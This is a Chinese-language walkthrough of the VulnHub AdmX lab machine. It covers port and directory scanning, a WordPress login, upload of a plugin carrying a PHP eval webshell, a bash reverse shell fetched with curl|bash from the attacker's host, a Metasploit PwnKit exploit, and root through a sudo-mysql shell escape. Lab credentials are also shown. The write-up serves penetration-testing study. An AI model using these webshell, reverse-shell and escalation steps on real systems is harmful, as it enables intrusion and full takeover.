vulnhub4

靶机地址: https://download.vulnhub.com/admx/AdmX_new.7z

信息收集

fscan 扫一下

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.120.138 

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.120.138 is alive
[*] Icmp alive hosts len is: 1
192.168.120.138:80 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle: http://192.168.120.138    code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
已完成 1/1
[*] 扫描结束,耗时: 3.580389206s
​

全端口再扫一下

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --min-rate 10000 -p- 192.168.120.138
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 21:12 CST
Nmap scan report for 192.168.120.138
Host is up (0.00013s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:67:1B:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
​

只开放了一个 80 端口,所以肯定是有 web 服务,访问 http://192.168.120.138 是一个默认的 apache2 页面

扫一下他的目录,肯定是有东西的,如果目录没有东西,就找他的域名

┌──(kali㉿kali)-[~/Desktop/Tools/dirsearch]
└─$ python dirsearch.py -u "http://192.168.120.138/" -x 403

  _|. _ _  _  _  _ _|_    v0.4.3                                     
 (_||| _) (/_(_|| (_| )                                              
                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11714

Output: /home/kali/Desktop/Tools/dirsearch/reports/http_192.168.120.138/__23-09-24_21-35-47.txt

Target: http://192.168.120.138/

[21:35:47] Starting:                                                 
[21:36:13] 301 -  318B  - /tools  ->  http://192.168.120.138/tools/
[21:36:13] 200 -    2KB - /tools/adminer.php
[21:36:21] 200 -    7KB - /wordpress/wp-login.php
[21:36:21] 200 -    8KB - /wordpress/

Task Completed
​

发现一个 wordpress 服务

但是加载资源非常卡

看他 F12 的页面

733 x 5101393 x 969

发现他写死访问的资源再 html 了

用 Proxy 设置替换一下访问的资源

733 x 3911348 x 719

点击设置,左上角直接搜 replace 就可以了

然后添加两个 Response 的 Item,就可以替换访问的资源了

其中有一个 wordpress 的登录页面:

733 x 6041224 x 1009

弱口令失败了,就尝试爆破一下吧:(优先找登录页面,尝试爆破再找其他的可利用点,还有一些数据库的登录处)

733 x 575879 x 690

只能说这个弱口令有点强

尝试登录,登录成功,访问后台

http://192.168.120.128/wordpress/wp-admin/
​

发现右下角的版本:

733 x 5641468 x 1130

之前看公众号有一个 CNVD,只要版本小于 6.9 都有一个 plugin 漏洞

写个 php 木马:

<?php
/*
Plugin Name: WordPress.org Plugin
Plugin URI:  https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version:     2.0
Author:      WordPress.org
Author URI:  https://developer.wordpress.org/
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
Text Domain: wporg
*/
eval($_REQUEST[8]);
?>
​

格式需要按照 wordpress 的格式写才能生效

把 1.php 压缩成 zip

上传插件:(访问 http://192.168.120.138/wordpress/wp-admin/plugins.php

这里可以上传插件

733 x 5681459 x 1130

733 x 5811420 x 1126

getshell

访问 http://192.168.120.138/wordpress/wp-content/plugins/1.php?8=phpinfo();​,如果 phpinfo 生效即为成功

733 x 5501480 x 1110

弹个 shell

选择一个目录编辑反弹 shell,文件名为 1,内容为:

bash -i >& /dev/tcp/192.168.120.128/7777 0>&1
​

在这个目录开一个 HTTP 服务:

python -m http.server 8888
​

然后监听 7777 端口:

nc -lvnp 7777
​

浏览器发起反弹 shell 请求:

http://192.168.120.138/wordpress/wp-content/plugins/1.php?8=system(%22curl%20192.168.120.128:8888/1|bash%22);
​

反弹 shell 之后看一下权限:

733 x 90767 x 94

权限提升

suid 提权

依旧是 suid 提权先尝试:

www-data@wp:/var/www/html/wordpress$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core18/1880/bin/mount
/snap/core18/1880/bin/ping
/snap/core18/1880/bin/su
/snap/core18/1880/bin/umount
/snap/core18/1880/usr/bin/chfn
/snap/core18/1880/usr/bin/chsh
/snap/core18/1880/usr/bin/gpasswd
/snap/core18/1880/usr/bin/newgrp
/snap/core18/1880/usr/bin/passwd
/snap/core18/1880/usr/bin/sudo
/snap/core18/1880/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1880/usr/lib/openssh/ssh-keysign
/snap/snapd/8542/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/su
/usr/bin/at
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/fusermount
​

老朋友 pkexec,再试一下 MSF 提权

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.120.128  LPORT=7777 -f elf > pb.elf
use exploit/multi/handler
set lport 7777
set lhost 192.168.120.128
set payload linux/x64/meterpreter/reverse_tcp
run
​

pkexec 提权

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
set PKEXEC /usr/bin/pkexec
​

733 x 4572194 x 1368

这次换一种提权方式吧,感觉每次都是 pkexec 没有什么提升

mysql 提权

我们还记得刚才有一个 Mysql 服务,如果 mysql 是 root 权限就可以执行命令了

这里说一个 mysql 的知识点

Windows 下:

mysql> help

For information about MySQL products and services, visit:
   http://www.mysql.com/
For developer information, including the MySQL Reference Manual, visit:
   http://dev.mysql.com/
To buy MySQL Enterprise support, training, or other products, visit:
   https://shop.mysql.com/

List of all MySQL commands:
Note that all text commands must be first on line and end with ';'
?         (\?) Synonym for `help'.
clear     (\c) Clear the current input statement.
connect   (\r) Reconnect to the server. Optional arguments are db and host.
delimiter (\d) Set statement delimiter.
ego       (\G) Send command to mysql server, display result vertically.
exit      (\q) Exit mysql. Same as quit.
go        (\g) Send command to mysql server.
help      (\h) Display this help.
notee     (\t) Don't write into outfile.
print     (\p) Print current command.
prompt    (\R) Change your mysql prompt.
quit      (\q) Quit mysql.
rehash    (\#) Rebuild completion hash.
source    (\.) Execute an SQL script file. Takes a file name as an argument.
status    (\s) Get status information from the server.
tee       (\T) Set outfile [to_outfile]. Append everything into given outfile.
use       (\u) Use another database. Takes database name as argument.
charset   (\C) Switch to another charset. Might be needed for processing binlog with multi-byte charsets.
warnings  (\W) Show warnings after every statement.
nowarning (\w) Don't show warnings after every statement.
resetconnection(\x) Clean session context.

For server side help, type 'help contents'
​

可以看到 Windwos 下的 mysql 是没有 system 这个选项的

但是 Linux 下的 help

mysql> help

For information about MySQL products and services, visit:
   http://www.mysql.com/
For developer information, including the MySQL Reference Manual, visit:
   http://dev.mysql.com/
To buy MySQL Enterprise support, training, or other products, visit:
   https://shop.mysql.com/

List of all MySQL commands:
Note that all text commands must be first on line and end with ';'
?         (\?) Synonym for `help'.
clear     (\c) Clear the current input statement.
connect   (\r) Reconnect to the server. Optional arguments are db and host.
delimiter (\d) Set statement delimiter.
edit      (\e) Edit command with $EDITOR.
ego       (\G) Send command to mysql server, display result vertically.
exit      (\q) Exit mysql. Same as quit.
go        (\g) Send command to mysql server.
help      (\h) Display this help.
nopager   (\n) Disable pager, print to stdout.
notee     (\t) Don't write into outfile.
pager     (\P) Set PAGER [to_pager]. Print the query results via PAGER.
print     (\p) Print current command.
prompt    (\R) Change your mysql prompt.
quit      (\q) Quit mysql.
rehash    (\#) Rebuild completion hash.
source    (\.) Execute an SQL script file. Takes a file name as an argument.
status    (\s) Get status information from the server.
system    (\!) Execute a system shell command.
tee       (\T) Set outfile [to_outfile]. Append everything into given outfile.
use       (\u) Use another database. Takes database name as argument.
charset   (\C) Switch to another charset. Might be needed for processing binlog with multi-byte charsets.
warnings  (\W) Show warnings after every statement.
nowarning (\w) Don't show warnings after every statement.
resetconnection(\x) Clean session context.
query_attributes Sets string parameters (name1 value1 name2 value2 ...) for the next query to pick up.
ssl_session_data_print Serializes the current SSL session data to stdout or file

For server side help, type 'help contents'
​

可以看到 Linux 下的 mysql 是有 system 选项的,可以利用 \! ​执行命令

回到题目,我们既然没有权限连接 mysql,这里就想到 sudo 了,但是要有密码和账户

无疑就是 cat /etc/passwd ​了

www-data@wp:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
wpadmin:x:1001:1001::/home/wpadmin:/bin/bash
​

发现这里还有一个 wpadmin 账号

我们尝试使用 su wpadmin​,密码 adam14 ​登入,成功!

那么就可以 sudo -l ​看一下哪些程序有 root 权限了

733 x 1771087 x 262

这里刚好就是 mysql

所以按照他的方式连接一下:

sudo /usr/bin/mysql -u root -D wordpress -p
​

密码再 wordpress 搭建网站的配置文件中有:

复制代码
www-data@wp:~/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );

define( 'AUTH_KEY',         '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY',  'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY',    '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY',        'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT',        'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT',   '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT',       'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );

$table_prefix = 'wp_';

define( 'WP_DEBUG', false );

if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
​

这里数据库登录成功,利用 \! ​执行命令

733 x 3191093 x 475

成功提权至 root 权限

相关推荐
海波东1 小时前
单例模式懒汉式、饿汉式(线程安全)
java·安全·单例模式
网安kk3 小时前
2025年三个月自学手册 网络安全(黑客技术)
linux·网络·python·安全·web安全·网络安全·密码学
dot.Net安全矩阵5 小时前
.NET | 剖析通过 TcpClient 实现内网端口转发
服务器·网络·tcp/ip·安全·.net
m0_7482507411 小时前
2020数字中国创新大赛-虎符网络安全赛道丨Web Writeup
前端·安全·web安全
Hacker_Oldv11 小时前
通过端口测试验证网络安全策略
安全·web安全
几维安全11 小时前
出海隐私合规解决方案,一文助力中企合规出海
网络·安全
燕雀安知鸿鹄之志哉.11 小时前
攻防世界 easyphp
安全·web安全·网络安全
老鑫安全培训12 小时前
从安全角度看 SEH 和 VEH
java·网络·安全·网络安全·系统安全·安全威胁分析
乐维_lwops12 小时前
安全筑堤,效率破浪 | 统一运维管理平台下的免密登录应用解析
运维·服务器·安全
AI服务老曹13 小时前
报警推送消息升级的名厨亮灶开源了
人工智能·安全·开源·音视频